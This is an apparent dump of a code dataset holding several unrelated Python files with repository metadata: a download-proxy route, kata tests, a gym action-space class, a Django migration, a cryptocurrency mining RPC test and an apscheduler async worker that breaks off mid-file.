            front = rc.lindex(queue_key, 0)
            if front:
                front = json.loads(front)
                front_num = front.get('num', 0)
                pos = result['num'] - front_num + 1
                result['queue_pos'] = pos
        else:
            result['ttl'] = rc.ttl(response_key)
    else:
        result = ERROR_RESP
    return result
@route('/download')
def download():
    browser_type, archive, url = get_params()
    response_key = get_cache_key(archive, browser_type, url)
    result = rc.get(response_key)
    if not result:
        raise HTTPError(status=404, body='Url Not Archived')
    result = json.loads(result)
    if not 'download_url' in result:
        raise HTTPError(status=404, body='Download Not Available')
    headers = {}
    session = result.get('download_session')
    if session:
        headers['Cookie'] = session
    r = requests.get(result['download_url'],
                     headers=headers,
                     stream=True)
    if r.status_code != 200:
        raise HTTPError(status=400, body='Invalid Download Result: {0} {1}'.format(r.status_code, r.reason))
    pass_headers = ('Content-Disposition', 'Content-Length', 'Content-Type')
    for h in pass_headers:
        response.set_header(h, r.headers.get(h))
    response.body = r.iter_content()
    return response
application = init()
| true | true |
79010d0d278cd90214a5a220bbd49e8f62be8006 | 2,014 | py | Python | python/kata04/test_temp.py | notapresent/codekata | b5cd1ec1b858e4dfbf078df8a99c3209cb8313f3 | [
"MIT"
] | null | null | null | python/kata04/test_temp.py | notapresent/codekata | b5cd1ec1b858e4dfbf078df8a99c3209cb8313f3 | [
"MIT"
] | null | null | null | python/kata04/test_temp.py | notapresent/codekata | b5cd1ec1b858e4dfbf078df8a99c3209cb8313f3 | [
"MIT"
] | null | null | null | import pytest
from temp import (download_to_file, ensure_datafile, records_from_lines, make_record, make_value, min_spread_record,
min_spread_day_num, parse_header)
def test_download_to_file(tmpdir):
    # NOTE(review): the download tests hit the live httpbin.org service,
    # so they need network access.
    file = tmpdir.join('test.txt')
    download_to_file(file.strpath, 'https://httpbin.org/get?testParam=1')
    assert 'testParam' in file.read()
def test_ensure_datafile_downloads(tmpdir):
    # File absent: ensure_datafile is expected to download it.
    file = tmpdir.join('test.txt')
    ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
    assert 'testParam' in file.read()
def test_ensure_datafile_uses_existing(tmpdir):
    # File present: ensure_datafile must leave it untouched.
    file = tmpdir.join('test.txt')
    file.write('content')
    ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
    assert file.read() == 'content'
def test_make_record():
    # header presumably maps column name -> (offset, width) into the
    # fixed-width line — matches the pairs parse_header returns below.
    header = {'One': (0, 1), 'Two': (3, 3), 'Three': (7, 2), 'Four': (10, 4)}
    line = "1 2.2 3* FOUR"
    rv = make_record(header, line)
    assert set(rv.keys()) == set(header)
    assert all(list(rv.values()))
def test_parse_header_rv():
    rv = parse_header(" One Two Three")
    assert len(rv) == 3
    assert rv['One'] == (1, 4)
    assert rv['Two'] == (5, 4)
    assert rv['Three'] == (9, 6)
def test_make_value():
    # int, plain string, float, trailing-asterisk int, and blank -> None.
    assert make_value('123') == 123
    assert make_value('ASDF') == 'ASDF'
    assert make_value('123.45') == 123.45
    assert make_value('123*') == 123
    assert make_value(' ') == None
def test_records_from_lines_skips_empty():
    lines = iter(['One', ' ', 'Two'])
    assert len(list(records_from_lines(lines))) == 1
def test_min_spread_record_rv():
    records = [
        {'max': 10, 'min': 0},
        {'max': 1, 'min': 0},  # this one should be returned
        {'max': None, 'min': None}
    ]
    assert min_spread_record(records, 'max', 'min') == {'max': 1, 'min': 0}
def test_min_spread_day_num_rv():
    records = [
        {'Dy': 1, 'MxT': 10, 'MnT': 0},
        {'Dy': 2, 'MxT': 5, 'MnT': 0},
    ]
    rv = min_spread_day_num(records)
    assert rv == 2
| 28.366197 | 116 | 0.619662 | import pytest
from temp import (download_to_file, ensure_datafile, records_from_lines, make_record, make_value, min_spread_record,
min_spread_day_num, parse_header)
# NOTE(review): comment-stripped duplicate of the kata04 test module above
# (dataset-concatenation artifact); code unchanged.
def test_download_to_file(tmpdir):
    file = tmpdir.join('test.txt')
    download_to_file(file.strpath, 'https://httpbin.org/get?testParam=1')
    assert 'testParam' in file.read()
def test_ensure_datafile_downloads(tmpdir):
    file = tmpdir.join('test.txt')
    ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
    assert 'testParam' in file.read()
def test_ensure_datafile_uses_existing(tmpdir):
    file = tmpdir.join('test.txt')
    file.write('content')
    ensure_datafile(file.strpath, 'https://httpbin.org/get?testParam=1')
    assert file.read() == 'content'
def test_make_record():
    header = {'One': (0, 1), 'Two': (3, 3), 'Three': (7, 2), 'Four': (10, 4)}
    line = "1 2.2 3* FOUR"
    rv = make_record(header, line)
    assert set(rv.keys()) == set(header)
    assert all(list(rv.values()))
def test_parse_header_rv():
    rv = parse_header(" One Two Three")
    assert len(rv) == 3
    assert rv['One'] == (1, 4)
    assert rv['Two'] == (5, 4)
    assert rv['Three'] == (9, 6)
def test_make_value():
    assert make_value('123') == 123
    assert make_value('ASDF') == 'ASDF'
    assert make_value('123.45') == 123.45
    assert make_value('123*') == 123
    assert make_value(' ') == None
def test_records_from_lines_skips_empty():
    lines = iter(['One', ' ', 'Two'])
    assert len(list(records_from_lines(lines))) == 1
def test_min_spread_record_rv():
    records = [
        {'max': 10, 'min': 0},
        {'max': 1, 'min': 0},
        {'max': None, 'min': None}
    ]
    assert min_spread_record(records, 'max', 'min') == {'max': 1, 'min': 0}
def test_min_spread_day_num_rv():
    records = [
        {'Dy': 1, 'MxT': 10, 'MnT': 0},
        {'Dy': 2, 'MxT': 5, 'MnT': 0},
    ]
    rv = min_spread_day_num(records)
    assert rv == 2
| true | true |
79010d69056dd11c86b0becb5e9e2295e0808861 | 2,355 | py | Python | rl/env/multiagent_particle_envs/multiagent/multi_discrete.py | unkper/PedestrainSimulationModule | 039ed0903a0861130566d8d1d862594064b8e0db | [
"MIT"
] | null | null | null | rl/env/multiagent_particle_envs/multiagent/multi_discrete.py | unkper/PedestrainSimulationModule | 039ed0903a0861130566d8d1d862594064b8e0db | [
"MIT"
] | null | null | null | rl/env/multiagent_particle_envs/multiagent/multi_discrete.py | unkper/PedestrainSimulationModule | 039ed0903a0861130566d8d1d862594064b8e0db | [
"MIT"
] | null | null | null | # An old version of OpenAI Gym's multi_discrete.py. (Was getting affected by Gym updates)
# (https://github.com/openai/gym/blob/1fb81d4e3fb780ccf77fec731287ba07da35eb84/gym/spaces/multi_discrete.py)
import numpy as np
import gym
class MultiDiscrete(gym.Space):
    """A series of discrete action sub-spaces with (possibly) different ranges.

    Parametrized by an array of [min, max] pairs, one per sub-space; each
    sub-space accepts any integer from `min` to `max` (both inclusive), and
    a value of 0 always needs to represent the NOOP action.

    e.g. a Nintendo game controller can be conceptualized as 3 sub-spaces:
        1) Arrow Keys: Discrete 5 - NOOP[0], UP[1], RIGHT[2], DOWN[3], LEFT[4]
        2) Button A:   Discrete 2 - NOOP[0], Pressed[1]
        3) Button B:   Discrete 2 - NOOP[0], Pressed[1]
    initialized as MultiDiscrete([ [0,4], [0,1], [0,1] ]).

    (Old, pre-update copy of OpenAI Gym's multi_discrete.py.  Fix: the
    dataset-statistics residue that had been fused onto the last source
    line was removed — it was not valid Python.)
    """
    def __init__(self, array_of_param_array):
        self.low = np.array([x[0] for x in array_of_param_array])
        self.high = np.array([x[1] for x in array_of_param_array])
        self.num_discrete_space = self.low.shape[0]

    def sample(self):
        """ Returns a array with one sample from each discrete action space """
        # For each row: floor(random * (max - min + 1) + min) is uniform over
        # the inclusive integer range [min, max].
        # NOTE(review): a fresh, unseeded RandomState per call means sampling
        # cannot be made reproducible through gym's seeding machinery.
        np_random = np.random.RandomState()
        random_array = np_random.rand(self.num_discrete_space)
        return [int(x) for x in np.floor(np.multiply((self.high - self.low + 1.), random_array) + self.low)]

    def contains(self, x):
        """True when x has exactly one in-range value per sub-space."""
        return len(x) == self.num_discrete_space and (np.array(x) >= self.low).all() and (np.array(x) <= self.high).all()

    @property
    def shape(self):
        # NOTE(review): returns an int (the number of sub-spaces), not a
        # tuple as gym's usual Space.shape convention would suggest.
        return self.num_discrete_space

    def __repr__(self):
        return "MultiDiscrete" + str(self.num_discrete_space)

    def __eq__(self, other):
        return np.array_equal(self.low, other.low) and np.array_equal(self.high, other.high)
# (https://github.com/openai/gym/blob/1fb81d4e3fb780ccf77fec731287ba07da35eb84/gym/spaces/multi_discrete.py)
import numpy as np
import gym
class MultiDiscrete(gym.Space):
    # NOTE(review): comment-stripped duplicate of the MultiDiscrete class
    # above (dataset-concatenation artifact).  Fix: only the " | true | true |"
    # residue fused onto the last line was removed — it was not valid Python.
    def __init__(self, array_of_param_array):
        self.low = np.array([x[0] for x in array_of_param_array])
        self.high = np.array([x[1] for x in array_of_param_array])
        self.num_discrete_space = self.low.shape[0]
    def sample(self):
        # For each row: round(random .* (max - min) + min, 0)
        np_random = np.random.RandomState()
        random_array = np_random.rand(self.num_discrete_space)
        return [int(x) for x in np.floor(np.multiply((self.high - self.low + 1.), random_array) + self.low)]
    def contains(self, x):
        return len(x) == self.num_discrete_space and (np.array(x) >= self.low).all() and (np.array(x) <= self.high).all()
    @property
    def shape(self):
        return self.num_discrete_space
    def __repr__(self):
        return "MultiDiscrete" + str(self.num_discrete_space)
    def __eq__(self, other):
        return np.array_equal(self.low, other.low) and np.array_equal(self.high, other.high)
79010d9d3f788353d118f2ed0c14776fa1c23768 | 1,389 | py | Python | lowfat/migrations/0090_auto_20170307_1518.py | elena-kolomeets/lowfat | f7647f5cd12519f722e41808157a96cc3e37b6ce | [
"BSD-3-Clause"
] | 6 | 2017-02-23T16:44:36.000Z | 2019-03-18T11:39:03.000Z | lowfat/migrations/0090_auto_20170307_1518.py | elena-kolomeets/lowfat | f7647f5cd12519f722e41808157a96cc3e37b6ce | [
"BSD-3-Clause"
] | 286 | 2017-02-07T15:00:41.000Z | 2022-03-08T12:56:09.000Z | lowfat/migrations/0090_auto_20170307_1518.py | elena-kolomeets/lowfat | f7647f5cd12519f722e41808157a96cc3e37b6ce | [
"BSD-3-Clause"
] | 2 | 2018-06-19T12:38:08.000Z | 2020-11-23T12:15:08.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-07 15:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def add_author_to_blog(apps, schema_editor):  # pylint: disable=unused-argument
    """Data migration: set each Blog's author to the claimant of its fund."""
    Blog = apps.get_model("lowfat", "Blog")  # pylint: disable=invalid-name
    for blog_entry in Blog.objects.all():
        blog_entry.author = blog_entry.fund.claimant
        blog_entry.save()
class Migration(migrations.Migration):
    # Must run after the migration that last touched these models.
    dependencies = [
        ('lowfat', '0089_auto_20170306_1706'),
    ]
    operations = [
        # New nullable author FK on Blog...
        migrations.AddField(
            model_name='blog',
            name='author',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Claimant'),
        ),
        # ...and on its history-tracking twin (no DB constraint there).
        migrations.AddField(
            model_name='historicalblog',
            name='author',
            field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='lowfat.Claimant'),
        ),
        # Blog.fund becomes optional (nullable/blank).
        migrations.AlterField(
            model_name='blog',
            name='fund',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Fund'),
        ),
        # Backfill author from the fund's claimant for existing rows.
        migrations.RunPython(add_author_to_blog),
    ]
| 35.615385 | 168 | 0.645788 |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
# NOTE(review): comment-stripped duplicate of the migration module above
# (dataset-concatenation artifact); code unchanged.
def add_author_to_blog(apps, schema_editor):
    Blog = apps.get_model("lowfat", "Blog")
    for blog in Blog.objects.all():
        blog.author = blog.fund.claimant
        blog.save()
class Migration(migrations.Migration):
    dependencies = [
        ('lowfat', '0089_auto_20170306_1706'),
    ]
    operations = [
        migrations.AddField(
            model_name='blog',
            name='author',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Claimant'),
        ),
        migrations.AddField(
            model_name='historicalblog',
            name='author',
            field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='lowfat.Claimant'),
        ),
        migrations.AlterField(
            model_name='blog',
            name='fund',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='lowfat.Fund'),
        ),
        migrations.RunPython(add_author_to_blog),
    ]
| true | true |
79010de06d633480247f5d160a4de1a7c3315b9f | 5,584 | py | Python | test/functional/mining_basic.py | elliottminns/livecoin | 0d9f12023e113c68501ddd3da5a7b7afebce9a3d | [
"MIT"
] | null | null | null | test/functional/mining_basic.py | elliottminns/livecoin | 0d9f12023e113c68501ddd3da5a7b7afebce9a3d | [
"MIT"
] | null | null | null | test/functional/mining_basic.py | elliottminns/livecoin | 0d9f12023e113c68501ddd3da5a7b7afebce9a3d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mining RPCs
- getmininginfo
- getblocktemplate proposal mode
- submitblock"""
import copy
from binascii import b2a_hex
from decimal import Decimal
from test_framework.blocktools import create_coinbase
from test_framework.mininode import CBlock
from test_framework.test_framework import LivecoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
def b2x(b):
    """Return the lowercase hex-string representation of a byte sequence."""
    return b.hex()
def assert_template(node, block, expect, rehash=True):
    """Submit `block` to the node in getblocktemplate proposal mode and
    assert the node's verdict equals `expect` (None means accepted).
    `rehash` recomputes the merkle root first so tx edits take effect.
    """
    if rehash:
        block.hashMerkleRoot = block.calc_merkle_root()
    rsp = node.getblocktemplate({'data': b2x(block.serialize()), 'mode': 'proposal'})
    assert_equal(rsp, expect)
class MiningTest(LivecoinTestFramework):
    """Exercise the mining RPCs: getmininginfo, getblocktemplate in
    proposal mode, and submitblock error handling.
    """
    def set_test_params(self):
        # Two nodes, continuing from the cached regtest chain (200 blocks).
        self.num_nodes = 2
        self.setup_clean_chain = False
    def run_test(self):
        """Check getmininginfo fields, then probe getblocktemplate /
        submitblock with one valid block and a series of deliberately
        broken variants, asserting the exact rejection reason for each.
        """
        node = self.nodes[0]
        self.log.info('getmininginfo')
        mining_info = node.getmininginfo()
        assert_equal(mining_info['blocks'], 200)
        assert_equal(mining_info['chain'], 'regtest')
        assert_equal(mining_info['currentblocktx'], 0)
        assert_equal(mining_info['currentblockweight'], 0)
        assert_equal(mining_info['difficulty'], Decimal('4.656542373906925E-10'))
        assert_equal(mining_info['networkhashps'], Decimal('0.003333333333333334'))
        assert_equal(mining_info['pooledtx'], 0)
        # Mine a block to leave initial block download
        node.generate(1)
        tmpl = node.getblocktemplate()
        self.log.info("getblocktemplate: Test capability advertised")
        assert 'proposal' in tmpl['capabilities']
        assert 'coinbasetxn' not in tmpl
        coinbase_tx = create_coinbase(height=int(tmpl["height"]) + 1)
        # sequence numbers must not be max for nLockTime to have effect
        coinbase_tx.vin[0].nSequence = 2 ** 32 - 2
        coinbase_tx.rehash()
        # Assemble a minimal valid block from the template fields.
        block = CBlock()
        block.nVersion = tmpl["version"]
        block.hashPrevBlock = int(tmpl["previousblockhash"], 16)
        block.nTime = tmpl["curtime"]
        block.nBits = int(tmpl["bits"], 16)
        block.nNonce = 0
        block.vtx = [coinbase_tx]
        self.log.info("getblocktemplate: Test valid block")
        assert_template(node, block, None)
        self.log.info("submitblock: Test block decode failure")
        assert_raises_rpc_error(-22, "Block decode failed", node.submitblock, b2x(block.serialize()[:-15]))
        self.log.info("getblocktemplate: Test bad input hash for coinbase transaction")
        bad_block = copy.deepcopy(block)
        bad_block.vtx[0].vin[0].prevout.hash += 1
        bad_block.vtx[0].rehash()
        assert_template(node, bad_block, 'bad-cb-missing')
        self.log.info("submitblock: Test invalid coinbase transaction")
        assert_raises_rpc_error(-22, "Block does not start with a coinbase", node.submitblock, b2x(bad_block.serialize()))
        self.log.info("getblocktemplate: Test truncated final transaction")
        assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(block.serialize()[:-1]), 'mode': 'proposal'})
        self.log.info("getblocktemplate: Test duplicate transaction")
        bad_block = copy.deepcopy(block)
        bad_block.vtx.append(bad_block.vtx[0])
        assert_template(node, bad_block, 'bad-txns-duplicate')
        self.log.info("getblocktemplate: Test invalid transaction")
        bad_block = copy.deepcopy(block)
        bad_tx = copy.deepcopy(bad_block.vtx[0])
        bad_tx.vin[0].prevout.hash = 255
        bad_tx.rehash()
        bad_block.vtx.append(bad_tx)
        assert_template(node, bad_block, 'bad-txns-inputs-missingorspent')
        self.log.info("getblocktemplate: Test nonfinal transaction")
        bad_block = copy.deepcopy(block)
        bad_block.vtx[0].nLockTime = 2 ** 32 - 1
        bad_block.vtx[0].rehash()
        assert_template(node, bad_block, 'bad-txns-nonfinal')
        self.log.info("getblocktemplate: Test bad tx count")
        # The tx count is immediately after the block header
        TX_COUNT_OFFSET = 80
        bad_block_sn = bytearray(block.serialize())
        assert_equal(bad_block_sn[TX_COUNT_OFFSET], 1)
        bad_block_sn[TX_COUNT_OFFSET] += 1
        assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(bad_block_sn), 'mode': 'proposal'})
        self.log.info("getblocktemplate: Test bad bits")
        bad_block = copy.deepcopy(block)
        bad_block.nBits = 469762303  # impossible in the real world
        assert_template(node, bad_block, 'bad-diffbits')
        self.log.info("getblocktemplate: Test bad merkle root")
        bad_block = copy.deepcopy(block)
        bad_block.hashMerkleRoot += 1
        assert_template(node, bad_block, 'bad-txnmrklroot', False)
        self.log.info("getblocktemplate: Test bad timestamps")
        bad_block = copy.deepcopy(block)
        bad_block.nTime = 2 ** 31 - 1
        assert_template(node, bad_block, 'time-too-new')
        bad_block.nTime = 0
        assert_template(node, bad_block, 'time-too-old')
        self.log.info("getblocktemplate: Test not best block")
        bad_block = copy.deepcopy(block)
        bad_block.hashPrevBlock = 123
        assert_template(node, bad_block, 'inconclusive-not-best-prevblk')
if __name__ == '__main__':
    # Allow running the functional test directly from the command line.
    MiningTest().main()
| 41.058824 | 141 | 0.681411 |
import copy
from binascii import b2a_hex
from decimal import Decimal
from test_framework.blocktools import create_coinbase
from test_framework.mininode import CBlock
from test_framework.test_framework import LivecoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
def b2x(b):
    """Return the lowercase hex string representation of the bytes *b*."""
    hex_bytes = b2a_hex(b)
    return hex_bytes.decode('ascii')
def assert_template(node, block, expect, rehash=True):
    """Propose *block* to *node* via getblocktemplate and assert the RPC reply.

    :param node: test node whose getblocktemplate RPC is exercised
    :param block: CBlock to serialize and submit in 'proposal' mode
    :param expect: expected RPC response (None for a valid block)
    :param rehash: recompute the merkle root first, so tests that tamper
        with header fields other than the merkle root do not fail with a
        stale-merkle error instead of the one under test
    """
    if rehash:
        block.hashMerkleRoot = block.calc_merkle_root()
    rsp = node.getblocktemplate({'data': b2x(block.serialize()), 'mode': 'proposal'})
    assert_equal(rsp, expect)
class MiningTest(LivecoinTestFramework):
    """Test mining RPCs.

    Covers getmininginfo, getblocktemplate in 'proposal' mode and
    submitblock, mostly by proposing deliberately malformed blocks and
    checking the reported rejection reason.
    """

    def set_test_params(self):
        self.num_nodes = 2
        self.setup_clean_chain = False

    def run_test(self):
        node = self.nodes[0]

        self.log.info('getmininginfo')
        mining_info = node.getmininginfo()
        assert_equal(mining_info['blocks'], 200)
        assert_equal(mining_info['chain'], 'regtest')
        assert_equal(mining_info['currentblocktx'], 0)
        assert_equal(mining_info['currentblockweight'], 0)
        assert_equal(mining_info['difficulty'], Decimal('4.656542373906925E-10'))
        assert_equal(mining_info['networkhashps'], Decimal('0.003333333333333334'))
        assert_equal(mining_info['pooledtx'], 0)

        # Mine an extra block so a fresh template can be requested.
        node.generate(1)
        tmpl = node.getblocktemplate()
        self.log.info("getblocktemplate: Test capability advertised")
        assert 'proposal' in tmpl['capabilities']
        assert 'coinbasetxn' not in tmpl

        # Build a coinbase for the next height; a non-max sequence keeps
        # nLockTime meaningful for the nonfinal-transaction test below.
        coinbase_tx = create_coinbase(height=int(tmpl["height"]) + 1)
        coinbase_tx.vin[0].nSequence = 2 ** 32 - 2
        coinbase_tx.rehash()

        # Assemble a valid block from the template fields.
        block = CBlock()
        block.nVersion = tmpl["version"]
        block.hashPrevBlock = int(tmpl["previousblockhash"], 16)
        block.nTime = tmpl["curtime"]
        block.nBits = int(tmpl["bits"], 16)
        block.nNonce = 0
        block.vtx = [coinbase_tx]

        self.log.info("getblocktemplate: Test valid block")
        assert_template(node, block, None)

        self.log.info("submitblock: Test block decode failure")
        assert_raises_rpc_error(-22, "Block decode failed", node.submitblock, b2x(block.serialize()[:-15]))

        self.log.info("getblocktemplate: Test bad input hash for coinbase transaction")
        bad_block = copy.deepcopy(block)
        bad_block.vtx[0].vin[0].prevout.hash += 1
        bad_block.vtx[0].rehash()
        assert_template(node, bad_block, 'bad-cb-missing')

        self.log.info("submitblock: Test invalid coinbase transaction")
        assert_raises_rpc_error(-22, "Block does not start with a coinbase", node.submitblock, b2x(bad_block.serialize()))

        self.log.info("getblocktemplate: Test truncated final transaction")
        assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(block.serialize()[:-1]), 'mode': 'proposal'})

        self.log.info("getblocktemplate: Test duplicate transaction")
        bad_block = copy.deepcopy(block)
        bad_block.vtx.append(bad_block.vtx[0])
        assert_template(node, bad_block, 'bad-txns-duplicate')

        self.log.info("getblocktemplate: Test invalid transaction")
        bad_block = copy.deepcopy(block)
        bad_tx = copy.deepcopy(bad_block.vtx[0])
        bad_tx.vin[0].prevout.hash = 255
        bad_tx.rehash()
        bad_block.vtx.append(bad_tx)
        assert_template(node, bad_block, 'bad-txns-inputs-missingorspent')

        self.log.info("getblocktemplate: Test nonfinal transaction")
        bad_block = copy.deepcopy(block)
        bad_block.vtx[0].nLockTime = 2 ** 32 - 1
        bad_block.vtx[0].rehash()
        assert_template(node, bad_block, 'bad-txns-nonfinal')

        self.log.info("getblocktemplate: Test bad tx count")
        # The tx count is immediately after the 80-byte block header.
        TX_COUNT_OFFSET = 80
        bad_block_sn = bytearray(block.serialize())
        assert_equal(bad_block_sn[TX_COUNT_OFFSET], 1)
        bad_block_sn[TX_COUNT_OFFSET] += 1
        assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(bad_block_sn), 'mode': 'proposal'})

        self.log.info("getblocktemplate: Test bad bits")
        bad_block = copy.deepcopy(block)
        bad_block.nBits = 469762303  # impossible in the real world
        assert_template(node, bad_block, 'bad-diffbits')

        self.log.info("getblocktemplate: Test bad merkle root")
        bad_block = copy.deepcopy(block)
        bad_block.hashMerkleRoot += 1
        # rehash=False, otherwise assert_template would repair the root.
        assert_template(node, bad_block, 'bad-txnmrklroot', False)

        self.log.info("getblocktemplate: Test bad timestamps")
        bad_block = copy.deepcopy(block)
        bad_block.nTime = 2 ** 31 - 1
        assert_template(node, bad_block, 'time-too-new')
        bad_block.nTime = 0
        assert_template(node, bad_block, 'time-too-old')

        self.log.info("getblocktemplate: Test not best block")
        bad_block = copy.deepcopy(block)
        bad_block.hashPrevBlock = 123
        assert_template(node, bad_block, 'inconclusive-not-best-prevblk')
if __name__ == '__main__':
MiningTest().main()
| true | true |
79010e1bdee63e2f2433d37394cdf133896e846e | 6,082 | py | Python | apscheduler/workers/async_.py | daya0576/apscheduler | 61b8b44c712c9a28e613044b12c553adbc6ca015 | [
"MIT"
] | 3 | 2021-04-02T14:44:13.000Z | 2022-01-27T08:41:28.000Z | apscheduler/workers/async_.py | zhenhua32/apscheduler | d10f20215d8c78e9e2d32d634f276bb89f86ca38 | [
"MIT"
] | null | null | null | apscheduler/workers/async_.py | zhenhua32/apscheduler | d10f20215d8c78e9e2d32d634f276bb89f86ca38 | [
"MIT"
] | null | null | null | import os
import platform
import threading
from asyncio import current_task, iscoroutinefunction
from collections.abc import Coroutine
from contextlib import AsyncExitStack
from datetime import datetime, timezone
from functools import partial
from logging import Logger, getLogger
from traceback import format_exc
from typing import Any, Callable, Dict, Optional, Set
from anyio import create_event, create_task_group, open_cancel_scope, run_sync_in_worker_thread
from anyio.abc import CancelScope, Event, TaskGroup
from ..abc import DataStore, Job
from ..events import EventHub, JobDeadlineMissed, JobFailed, JobSuccessful, JobUpdated
class AsyncWorker(EventHub):
    """Runs jobs locally in a task group.

    Acquires jobs from a :class:`DataStore`, executes them concurrently
    inside an anyio task group and publishes lifecycle events
    (JobUpdated / JobSuccessful / JobFailed / JobDeadlineMissed).
    Use as an async context manager, or call ``run()`` directly.
    """

    # Set while the worker is active; the class-level None defaults also
    # serve as fallbacks after ``del self.<attr>`` in run()/acquire.
    _task_group: Optional[TaskGroup] = None
    _stop_event: Optional[Event] = None
    _running: bool = False
    _running_jobs: int = 0
    _acquire_cancel_scope: Optional[CancelScope] = None

    def __init__(self, data_store: DataStore, *, max_concurrent_jobs: int = 100,
                 identity: Optional[str] = None, logger: Optional[Logger] = None,
                 run_sync_functions_in_event_loop: bool = True):
        """
        :param data_store: store from which jobs are acquired and released
        :param max_concurrent_jobs: cap on simultaneously running jobs
        :param identity: worker id used when acquiring/releasing jobs;
            defaults to ``<host>-<pid>-<thread id>``
        :param logger: logger to use (defaults to this module's logger)
        :param run_sync_functions_in_event_loop: if False, plain (non-async)
            job functions are run in a worker thread instead of blocking
            the event loop
        """
        super().__init__()
        self.data_store = data_store
        self.max_concurrent_jobs = max_concurrent_jobs
        self.identity = identity or f'{platform.node()}-{os.getpid()}-{threading.get_ident()}'
        self.logger = logger or getLogger(__name__)
        self.run_sync_functions_in_event_loop = run_sync_functions_in_event_loop
        self._acquired_jobs: Set[Job] = set()
        self._exit_stack = AsyncExitStack()

        if self.max_concurrent_jobs < 1:
            raise ValueError('max_concurrent_jobs must be at least 1')

    async def __aenter__(self):
        await self._exit_stack.__aenter__()

        # Initialize the data store
        await self._exit_stack.enter_async_context(self.data_store)

        # Start the actual worker and wait until its run loop is live.
        self._task_group = create_task_group()
        await self._exit_stack.enter_async_context(self._task_group)
        start_event = create_event()
        await self._task_group.spawn(self.run, start_event)
        await start_event.wait()

        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        # Force-cancel running jobs only when exiting due to an exception.
        await self.stop(force=exc_type is not None)
        await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)

    async def run(self, start_event: Optional[Event] = None) -> None:
        """Main loop: acquire jobs up to the concurrency limit and spawn them.

        Sets *start_event* (if given) once the loop is running; sets
        ``_stop_event`` on exit so ``wait_until_stopped()`` unblocks.
        """
        self._stop_event = create_event()
        self._running = True
        if start_event:
            await start_event.set()

        while self._running:
            limit = self.max_concurrent_jobs - self._running_jobs
            jobs = []
            # The cancel scope lets stop() abort a blocking acquire_jobs call.
            async with open_cancel_scope() as self._acquire_cancel_scope:
                try:
                    jobs = await self.data_store.acquire_jobs(self.identity, limit)
                finally:
                    del self._acquire_cancel_scope

            for job in jobs:
                await self._task_group.spawn(self._run_job, job)

        await self._stop_event.set()
        del self._stop_event
        del self._task_group

    async def _run_job(self, job: Job) -> None:
        """Execute one job, publishing lifecycle events and releasing it."""
        # Check if the job started before the deadline
        now = datetime.now(timezone.utc)
        if job.start_deadline is not None:
            if now.timestamp() > job.start_deadline.timestamp():
                self.logger.info('Missed the deadline of job %r', job.id)
                event = JobDeadlineMissed(
                    now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,
                    scheduled_fire_time=job.scheduled_fire_time, start_time=now,
                    start_deadline=job.start_deadline
                )
                await self.publish(event)
                return

        # Set the job as running and publish a job update event
        self.logger.info('Started job %r', job.id)
        job.started_at = now
        event = JobUpdated(
            timestamp=now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id
        )
        await self.publish(event)

        self._running_jobs += 1
        try:
            return_value = await self._call_job_func(job.func, job.args, job.kwargs)
        except BaseException as exc:
            # NOTE(review): this also swallows cancellation exceptions and
            # reports them as job failure — confirm that is intended.
            self.logger.exception('Job %r raised an exception', job.id)
            event = JobFailed(
                timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
                schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
                start_time=now, start_deadline=job.start_deadline,
                traceback=format_exc(), exception=exc
            )
        else:
            self.logger.info('Job %r completed successfully', job.id)
            event = JobSuccessful(
                timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
                schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
                start_time=now, start_deadline=job.start_deadline, return_value=return_value
            )

        self._running_jobs -= 1
        await self.data_store.release_jobs(self.identity, [job])
        await self.publish(event)

    async def _call_job_func(self, func: Callable, args: tuple, kwargs: Dict[str, Any]):
        """Invoke *func*, awaiting coroutines and optionally off-loading
        sync functions to a worker thread (see constructor flag)."""
        if not self.run_sync_functions_in_event_loop and not iscoroutinefunction(func):
            wrapped = partial(func, *args, **kwargs)
            return await run_sync_in_worker_thread(wrapped)

        return_value = func(*args, **kwargs)
        if isinstance(return_value, Coroutine):
            return_value = await return_value

        return return_value

    async def stop(self, force: bool = False) -> None:
        """Stop the run loop; with ``force=True`` also cancel running jobs."""
        self._running = False
        if self._acquire_cancel_scope:
            await self._acquire_cancel_scope.cancel()

        if force and self._task_group:
            await self._task_group.cancel_scope.cancel()

    async def wait_until_stopped(self) -> None:
        """Block until the run loop has fully exited (no-op if not running)."""
        if self._stop_event:
            await self._stop_event.wait()
| 40.278146 | 95 | 0.65735 | import os
import platform
import threading
from asyncio import current_task, iscoroutinefunction
from collections.abc import Coroutine
